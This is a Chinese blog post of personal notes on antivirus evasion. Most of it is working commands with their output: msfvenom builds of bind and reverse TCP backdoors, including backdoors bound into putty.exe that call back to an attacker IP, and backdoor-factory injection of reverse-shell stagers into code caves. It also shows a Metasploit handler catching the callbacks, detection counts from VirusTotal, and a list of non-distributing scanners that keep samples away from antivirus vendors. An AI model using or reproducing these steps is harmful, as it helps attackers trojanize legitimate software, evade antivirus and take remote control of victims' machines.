• 免杀技术


    与防病毒厂商共享信息

    VirusTotal

      https://www.virustotal.com/zh-cn

    VirScan

      https://virscan.org

    黑产在线查杀引擎

      https://nodistribute.com

      http://viruscheckmate.com扫描网站安全性

      http://onlinelinkscan.com

    使用msf编码模块生成后门

      msfvenom -p windows/shell/bind_tcp LPORT=444 -f exe -o a.exe       21个厂商报毒

      增加编码模块

      msfvenom -a x86 -p windows/shell/bind_tcp LPORT=444 -e cmd/powershell_base64 -i 9 -f exe -o b.exe  20个厂商报毒

       使用编码后效果并不明显,还是很多厂商报毒

    使用模板程序隐藏后门,效果比较好

      msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -f exe -o c.exe

      将后门绑定到putty中,这里用的是反弹shell 注意参数lhost地址填写的是攻击者的IP地址,绑定后putty会报废,如果不想破坏使用 -k 参数

      msfvenom -p windows/shell/reverse_tcp lhost=192.168.137.128 lport=444 -x putty.exe -k -f exe -o d.exe

      8个厂商报毒

    +

    payload: 在目标系统执行的代码或指令,使得获取shell

    shellcode : 获取shell的code

    shell             后门程序

    reverser_tcp 反弹shell

    bind_tcp      正向shell

    meterpreter 更高级的shell,集成了很多脚本,更容易使用

     【meterpreter命令】

        getuid 当前用户信息

        getsystem 提权

        help 查看帮助

        screenshot

    因为msf知名度太大了,做出的免杀指纹早已被杀毒厂商收录了

    kali存放着windows下的执行程序目录

    /usr/share/windows-binaries/

    shellter 每次生成的后门程序代码都不同,动态变化的特征,难以用指纹匹配

    后门利用

    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/shell/reverse_tcp
    payload => windows/shell/reverse_tcp
    msf exploit(multi/handler) > set lhost 192.168.137.128
    lhost => 192.168.137.128
    msf exploit(multi/handler) > set lport 444
    lport => 444
    msf exploit(multi/handler) >

    msf exploit(multi/handler) > show options

    Module options (exploit/multi/handler):

       Name  Current Setting  Required  Description
       ----  ---------------  --------  -----------


    Payload options (windows/shell/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.137.128  yes       The listen address
       LPORT     444              yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Wildcard Target

    msf exploit(multi/handler) > run

    [*] Started reverse TCP handler on 192.168.137.128:444

     

    乱码将终端编码改成 gbk 或者 gb2312

    shllter

    veil-framework

    backdoor生成的后门曾经很骚,没有一个杀软报毒,在黑帽大会秀了一波,现在不行了,不推荐使用

    backdoor-factory 利用代码洞注入后门,不改变体积 code cave

    backdoor-factory -f putty.exe -S      检查是否支持注入后门

    backdoor-factory -f putty.exe -c -l 100    检查大于100字节的代码洞数量

    backdoor-factory -f putty.exe -s show    查看哪些payload可以用

    普通注入模式(体积会变大,直接在程序后面加代码)

    backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

     

    大小对比

    单代码洞注入(体积不会变,需要选择代码洞)

    backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -a

    最好选择代码洞比较大的,否则容易导致溢出,所以这里选择1,这里大小反而变小了,理论上应该不变的

     

    使用的时候360杀软报毒了。在线监测有23个厂商报毒,效果不怎样,0day似的

    多代码洞注入模式

    backdoor-factory -f putty_no.exe -s iat_reverse_tcp_stager_threaded -H 192.168.137.129 -P 444 -J

    要选多次代码洞,尽量选大的,不然要选很多次

    利用:

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp

    set LPORT 444

    set LHOST 192.168.137.129

  • 相关阅读:
    zz java java.nio.ByteBuffer flip
    看到的应用mina做的一个实例
    命令行工具SVN
    ByteBuffer 理解
    Linux命令行下常用svn命令
    三元操作符对null 的处理
    获取最后一个字符串
    C#分割字符串
    学习Silverlight 书籍
    oralce 进行多表同步
  • 原文地址:https://www.cnblogs.com/demonxian3/p/8301441.html
Copyright © 2020-2023  润新知